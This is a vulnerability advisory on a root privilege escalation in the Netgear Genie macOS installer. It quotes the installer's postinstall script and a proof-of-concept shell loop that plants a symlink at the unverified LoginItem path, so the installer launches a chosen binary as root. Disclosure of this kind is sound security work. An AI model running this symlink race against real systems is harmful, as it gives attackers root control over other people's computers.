Netgear Genie MacOS Installer Privilege Escalation

In the latest installation package for Netgear Genie for macOS, the "postinstall" script included in the installer allows for local privilege escalation to root privileges due to improper permissions on files used throughout the installation process.

During the installation process for Netgear Genie, the following postinstall script is run as root: 

#!/bin/sh
rm ~/.NETGEARGenie/genie.ini
#sudo /Applications/NETGEARGenie.app/Contents/MacOS/NETGEARGenieDaemon
#/Applications/NETGEARGenie.app/Contents/MacOS/NETGEARGenie -firststart
rm ~/Library/Application\ Support/NETGEARGenie/genie.ini
#rm -f ~/Library/Application\ Support/Dock/*.db && killall Dock
chmod a+w /Applications/NETGEARGenie.app/Contents/MacOS/NETGEARGenie.pid
sudo open -a /Applications/NETGEARGenie.app/Contents/MacOS/LoginItem
sudo rm /Applications/NETGEARGenie.app/Contents/MacOS/Tools/scripts/tmp.txt
echo "dafdafdas"

The vulnerable portion of code above is the sudo open -a ... line. The scripts / installation processes do not verify the contents of the binary that is opened on that line. This means that if an attacker / malicious process / etc. were to see a Netgear Genie Installer downloaded, they would be able to plant a malicious binary or symlink in this location during the installation process and escalate their privileges to root. The following is an example exploit that can be run prior to running the installer. Once the installer finishes running, Safari will be run with root privileges.

$ mkdir -p /Applications/NETGEARGenie.app/Contents/MacOS/          
$ while true; do
  ln -f -F -s /Applications/Safari.app/Contents/MacOS/Safari "/Applications/NETGEARGenie.app/Contents/MacOS/LoginItem";
done